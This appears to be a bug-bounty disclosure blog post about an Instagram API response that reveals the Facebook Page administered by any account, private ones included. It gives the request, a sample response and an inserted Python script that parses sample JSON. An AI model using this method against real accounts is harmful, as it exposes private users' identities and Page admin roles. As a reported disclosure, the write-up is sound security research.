Page admin disclosure via facebook profile link embedded in instagram

Gtm Mänôz
2 min read · Oct 6, 2023


Instagram has a feature that shows the Facebook account linked to a profile. In the same way, an Instagram user can also link their Facebook Page. When both are set up together, an attacker can disclose which Facebook Page is connected to the Facebook user whose profile link is embedded in that Instagram account, which in turn reveals that the person administers that Page.

This discloses the connected Facebook account and Facebook Page for any Instagram account, private accounts included. The Page connection is not visible even in the Facebook Ad Library page view at https://www.facebook.com/ads/library/?active_status=all&ad_type=all&country=US&view_all_page_id=PageID&search_type=page&media_type=all

Proof of concept

Request:

GET /api/v1/users/ig_id/info/ HTTP/2
Host: i.instagram.com
-other headers-

where:
ig_id = the numeric Instagram user id of the target (private) Instagram account (the real user id, not the shadow id), which can be obtained from the web itself.

To get ig_id, open the link below. It returns a JSON response; search it for logging_page_id, which carries the numeric id.
https://www.instagram.com/username/?__a=1&__d=dis

Response:

{"user":{"biography":"Footballer ⚽️ at day 🌞 || Bug hunter 🎭️ at night 🌃\n#football #fcbarcelona #infosec #bugbounty","primary_profile_link_type":0,"show_fb_link_on_profile":true,"show_fb_page_link_on_profile":false,"can_hide_category":true,"smb_support_partner":null,"current_catalog_id":null,"mini_shop_seller_onboarding_status":null,"account_category":"","can_add_fb_group_link_on_profile":false,"can_use_affiliate_partnership_messaging_as_creator":false,"can_use_affiliate_partnership_messaging_as_brand":false,"existing_user_age_collection_enabled":true,"fbid_v2":"17841404238393811","feed_post_reshare_disabled":false,"full_name":"Manoj Gautam","has_public_tab_threads":true,"highlight_reshare_disabled":false,"include_direct_blacklist_status":true,"is_direct_roll_call_enabled":true,"is_new_to_instagram":false,"is_private":true,"pk":4270493279,"pk_id":"4270493279","profile_type":0,"show_account_transparency_details":true,"show_ig_app_switcher_badge":true,"show_post_insights_entry_point":true,"show_text_post_app_badge":false,"show_text_post_app_switcher_badge":true,"third_party_downloads_enabled":0,"strong_id__":"4270493279","biography_with_entities":{"raw_text":"Footballer ⚽️ at day 🌞 || Bug hunter 🎭️ at night 🌃\n#football #fcbarcelona #infosec #bugbounty","entities":[{"hashtag":{"id":"17843881846027410","name":"football"}},{"hashtag":{"id":"17843844070000942","name":"fcbarcelona"}},{"hashtag":{"id":"17843805634059707","name":"bugbounty"}},{"hashtag":{"id":"17843744590011567","name":"infosec"}}]},"external_url":"","category":null,"is_category_tappable":false,"is_business":false,"professional_conversion_suggested_account_type":2,"account_type":1,"displayed_action_button_partner":null,"smb_delivery_partner":null,"smb_support_delivery_partner":null,"displayed_action_button_type":null,"is_call_to_action_enabled":null,"num_of_admined_pages":null,"page_id":null,"page_name":null,"ads_page_id":290263164472632,"ads_page_name":"Gtm Mänôz","shopping_post_onboard_nux_type":null,"ads_incentive_expiration_date":null,"account_badges":[],"active_standalone_fundraisers":{"total_count":0,"fundraisers":[]},"auto_expand_chaining":true,"avatar_status":{"has_avatar":true},"bio_links":[{"link_id":17985440860864340,"url":"https://www.facebook.com/Gtm0x01","lynx_url":"","link_type":"facebook","title":"Facebook profile","open_external_url_with_in_app_browser":true},],

In the response, ads_page_id is the id of the connected Facebook Page and ads_page_name is its name. Note that page_id and page_name are null and show_fb_page_link_on_profile is false, so the Page is not displayed on the profile itself, yet the API body still returns it. The bio_links entry with link_type "facebook" ties the same account to the embedded Facebook profile, and fbid_v2 is returned as well, so all of this is available for a private account.
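The two steps above (pull ig_id out of the profile page JSON, then read the Page fields out of the user info response) as an added, offline example. This is not the author's code; it only parses constructed sample responses embedded inline, trimmed to the fields the write-up relies on (the values are the ones the author published for their own account), and the nesting of logging_page_id in the profile JSON is an assumption, which is why the lookup walks the whole document. The real request additionally needs the session and app headers the write-up elides, and those are deliberately not reproduced.

```python
import json
import re
from typing import Any, Dict, Iterator, List, Optional, Tuple

# Constructed sample of the https://www.instagram.com/<username>/?__a=1&__d=dis
# response, reduced to the one key the write-up uses. The exact nesting and the
# "profilePage_" prefix are assumptions, so extract_ig_id() searches every depth.
PROFILE_PAGE_JSON = """
{"seo_category_infos": [], "logging_page_id": "profilePage_4270493279",
 "show_suggested_profiles": false, "graphql": {"user": {"is_private": true}}}
"""

# Constructed sample of the i.instagram.com /api/v1/users/<ig_id>/info/ response,
# cut down to the fields discussed in the write-up.
USER_INFO_JSON = """
{"user": {"pk": 4270493279, "is_private": true, "fbid_v2": "17841404238393811",
 "show_fb_link_on_profile": true, "show_fb_page_link_on_profile": false,
 "page_id": null, "page_name": null,
 "ads_page_id": 290263164472632, "ads_page_name": "Gtm Mänôz",
 "bio_links": [{"link_id": 17985440860864340,
   "url": "https://www.facebook.com/Gtm0x01", "link_type": "facebook",
   "title": "Facebook profile"}]}, "status": "ok"}
"""


def _walk(node: Any) -> Iterator[Tuple[str, Any]]:
    """Yield (key, value) for every mapping entry at any depth of a JSON document."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield key, value
            yield from _walk(value)
    elif isinstance(node, list):
        for item in node:
            yield from _walk(item)


def extract_ig_id(profile_page: str) -> Optional[str]:
    """Step 1: return the numeric ig_id carried by logging_page_id, or None."""
    for key, value in _walk(json.loads(profile_page)):
        if key == "logging_page_id" and isinstance(value, str):
            match = re.search(r"(\d+)$", value)
            if match:
                return match.group(1)
    return None


def user_info_request(ig_id: str) -> str:
    """Step 2a: build the request line from the write-up (auth headers omitted)."""
    if not ig_id.isdigit():
        raise ValueError("ig_id must be the numeric user id, not a shadow id")
    return f"GET /api/v1/users/{ig_id}/info/ HTTP/2\r\nHost: i.instagram.com\r\n"


def page_disclosure(user_info: str) -> Dict[str, Any]:
    """Step 2b: collect every field in the body that ties the account to Facebook."""
    user = json.loads(user_info)["user"]
    facebook_links: List[str] = [
        link["url"]
        for link in user.get("bio_links", [])
        if link.get("link_type") == "facebook"
    ]
    ads_page_id = user.get("ads_page_id")
    return {
        "ig_id": str(user["pk"]),
        "is_private": bool(user.get("is_private")),
        "fbid_v2": user.get("fbid_v2"),
        "page_id": user.get("page_id"),
        "page_name": user.get("page_name"),
        "ads_page_id": ads_page_id,
        "ads_page_name": user.get("ads_page_name"),
        "facebook_links": facebook_links,
        # The actual bug: a Page the profile does not display is still in the body.
        "page_leaked": ads_page_id is not None
        and not user.get("show_fb_page_link_on_profile", False),
    }


if __name__ == "__main__":
    ig_id = extract_ig_id(PROFILE_PAGE_JSON)
    print(user_info_request(ig_id or ""))
    print(json.dumps(page_disclosure(USER_INFO_JSON), indent=2, ensure_ascii=False))
```

Running it prints the request line for ig_id 4270493279 and a summary in which page_leaked is true: ads_page_id/ads_page_name are populated while page_id/page_name are null and show_fb_page_link_on_profile is false, which is exactly the condition the write-up describes.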

Impact

Page admin disclosure: the response links an Instagram account, private or not, to the Facebook Page it is connected to, revealing that the account owner administers that Page.

Timeline

  • 19 Jan, 2023 — Report sent to Facebook.
  • 24 Jan, 2023 — Triaged.
  • 29 Mar, 2023 — Bounty awarded by Facebook.
  • 5 Jun, 2023 — Asked Facebook for an update on the fix.
  • 3 Aug, 2023 — Marked as Informative by Facebook.
